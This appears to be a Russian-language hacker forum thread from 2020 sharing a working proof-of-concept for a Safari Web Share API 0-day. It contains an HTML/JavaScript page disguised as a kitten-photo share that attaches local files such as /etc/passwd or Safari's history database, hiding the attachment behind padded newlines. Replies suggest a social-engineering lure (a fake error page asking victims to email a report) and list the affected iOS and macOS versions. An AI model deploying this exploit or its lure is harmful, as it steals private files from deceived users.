Remote Stealing local files, Safari Web Share API, CVE-N\A, 0-day

weaver · 26.08.2020

PoC

JavaScript:

<html>
<script>
var opts = {text: 'check out this cute kitten! http://somerandomimagewebsite.com/cat.jpg\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n', url:
/* 'file:///private/var/mobile/Library/Safari/History.db' */
'file:///etc/passwd'};

function run() {
 navigator.share(opts);
}
</script>
<body>
Check out this cute kitten!
<br/>
<img width="200px" height="200px" src="cat.jpg">
<br/>
<button onclick='run();'>share it with friends!</button>
</body>
</html>

Подробности: https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html
Новости: https://xakep.ru/2020/08/25/safari-web-share-bug/

Mr.Di · 26.08.2020

Интересная штука, вопрос эксплуатации. По идее только социалка: "у вас вышла диагностическая страница? да ошибка, странно, нажмите кнопку отправить отчет об ошибке и укажите емейл написанный на странице"

tabac · 27.08.2020

Хорошее описание тут https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html с живым примером эксплуатации

добавлю по поводу версий

This was tested on iOS (13.4.1, 13.6), macOS Mojave 10.14.16 with Safari 13.1 (14609.1.20.111.8) and on macOS Catalina 10.15.5 with Safari 13.1.1 (15609.2.9.1.2).
As for today (24/08/2020) there is no fix available.

и видео:

Remote Stealing local files, Safari Web Share API, CVE-N\A, 0-day

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

Mr.Di

(L1) cache

tabac

CPU register